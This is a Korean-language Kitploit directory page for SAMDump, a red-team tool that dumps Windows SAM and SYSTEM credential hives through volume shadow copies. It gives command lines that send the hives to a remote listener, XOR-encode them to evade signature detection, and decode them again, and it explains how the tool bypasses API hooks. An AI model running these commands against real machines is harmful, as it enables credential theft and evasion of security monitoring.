Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SAMDump — SAM 및 SYSTEM 하이브를 VSS(볼륨 섀도 복사본) API를 사용하여 추출합니다. 외부 유출 및 XOR 난독화 옵션을 포함합니다. C#, C++, Crystal, Python, Rust, Golang, Nim 및 Deno(Javascript)로 작성되었습니다. | Kitploit
도구/GitHubGitHub/ricardojoserf/samdump
Privilege EscalationEncryption/Decryption ToolsData ExfiltrationPost-ExploitationUtilities & FrameworksRed Teaming
GitHubricardojoserf/samdump

SAMDump

SAM 및 SYSTEM 하이브를 VSS(볼륨 섀도 복사본) API를 사용하여 추출합니다. 외부 유출 및 XOR 난독화 옵션을 포함합니다. C#, C++, Crystal, Python, Rust, Golang, Nim 및 Deno(Javascript)로 작성되었습니다.

저장소 보기
37246510일 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

SAMDump

볼륨 섀도 복사 서비스(VSS)를 사용하여 Windows SAM 및 SYSTEM 파일을 추출하며, 여러 유출 옵션과 XOR 난독화를 지원합니다:

  • VSS를 사용하여 볼륨 섀도 복사본을 나열하고 필요한 경우 생성합니다
  • 섀도 복사본에서 SAM 및 SYSTEM 파일을 추출합니다
  • 파일 작업에 NT API 호출(NtCreateFile, NtReadFile, NtWriteFile)을 사용합니다
  • 난독화를 위한 XOR 인코딩을 지원합니다
  • 유출 방법: 로컬 저장 또는 네트워크 전송

C++, C#, Crystal 및 Python으로 구현되었으며, 최신 Windows 버전에서 작동합니다.

상승된 권한이 필요하며, 섀도 복사본이 생성된 경우 약 5분 후에 자동으로 삭제됩니다.


사용법

root@kitploit:~
SAMDump.exe [OPTIONS]

Options:
  --save-local [BOOL]    Save locally (default: false)
  --output-dir DIR       Output directory (default: C:\Windows\tasks)
  --send-remote [BOOL]   Send remotely (default: false)
  --host IP              Host for remote sending (default: 127.0.0.1)
  --port PORT            Port for remote sending (default: 7777)
  --xor-encode [BOOL]    XOR Encode (default: false)
  --xor-key KEY          Enable XOR with specified key (default: SAMDump2025)
  --disk DISK            Disk for shadow copy (default: C:\)
  --help                 Show this help

인코딩 없이 로컬에 저장:

root@kitploit:~
SAMDump.exe --save-local --output-dir "C:\temp"

img1

XOR 인코딩으로 로컬에 저장:

root@kitploit:~
SAMDump.exe --save-local --xor-encode --xor-key "SAMDump2025"

img2

기본 키를 사용하여 XOR 인코딩으로 원격 서버로 전송:

root@kitploit:~
SAMDump.exe --send-remote --host 192.168.1.72 --port 1234 --xor-encode

img3


파일 수신 서버

server.py는 네트워크를 통해 파일을 수신하며, 자동 XOR 디코딩 및 파일명 형식을 지원하는 Python 서버입니다:

root@kitploit:~
python server.py [OPTIONS]

Options:
  --host HOST     IP address to listen on (default: 0.0.0.0)
  --port PORT     Port to listen on (default: 7777)
  --xor-key KEY   Key for XOR decoding (optional)

특정 인터페이스와 포트에서 XOR 키를 사용하여 수신:

root@kitploit:~
python server.py --host 192.168.1.72 --port 1234 --xor-key "SAMDump2025"

img4

파일명에는 IP 주소와 날짜가 포함되어 있어, 다른 시스템에서 파일을 전송하여 프로세스를 자동화할 수 있습니다.


파일 디코딩 스크립트

xor-decoder.py는 XOR 인코딩된 SAM 및 SYSTEM 파일을 로컬에서 디코딩하는 Python 스크립트입니다:

root@kitploit:~
python xor-decoder.py [OPTIONS]

Options:
  --sam SAM         Path to encoded SAM file (required)
  --system SYSTEM   Path to encoded SYSTEM file (required)
  --xor-key KEY     XOR key for decoding (default: SAMDump2025)
  --output-dir DIR  Output directory for decoded files (default: ./decoded)

기본 키로 디코딩:

root@kitploit:~
python xor-decoder.py --sam sam.txt --system system.txt

img5

사용자 지정 키와 출력 디렉터리로 디코딩:

root@kitploit:~
python xor-decoder.py --sam sam.txt --system system.txt --xor-key "MyKey" --output-dir ./results

img6


구현

이 프로젝트는 세 가지 언어로 구현된 버전을 포함합니다:

  • C++: 초기 구현
  • C#: 더 나은 이식성을 위한 .NET 버전
  • Python: comtypes 라이브러리 설치 필요 (pip install comtypes)

동기

이 프로세스를 자동화하고 싶었고, 제가 접하는 대부분의 Windows는 VSS를 실행 중이지만, 보안 솔루션들은 잘 알려진 기술이기 때문에 vssadmin을 사용하여 섀도 복사본을 생성하고 이러한 파일을 추출하는 것을 탐지합니다.

이 도구는 원격 전송 모드를 사용할 때 대상 파일 시스템에 쓰지 않고 파일을 추출하며, XOR 인코딩은 시그니처 기반 탐지를 회피하기 위한 기본 난독화를 제공합니다(원격 모드에서도).

또한 NT API 호출을 활용하여 일부 모니터링 및 사용자 모드 API 후크를 우회합니다.


NT API 통합

이 도구는 표준 Windows API 함수 대신 NT 시스템 호출을 사용하여, 일반적으로 모니터링되는 일부 사용자 모드 API 후크를 우회할 수 있습니다:

  • NtCreateFile 및 NtReadFile: 섀도 복사본의 SAM 및 SYSTEM 파일에 대한 핸들을 열고 바이트를 읽는 데 사용됩니다
  • NtWriteFile: 로컬로 파일을 저장하는 데 사용됩니다

감사의 말

@vx-underground님께 감사드립니다. Export Address Table(EAT) 탐색 코드에서 불필요한 NtReadVirtualMemory 호출을 직접 포인터 접근으로 대체하는 최적화를 식별하고 제안해 주셨습니다.

도구 다운로드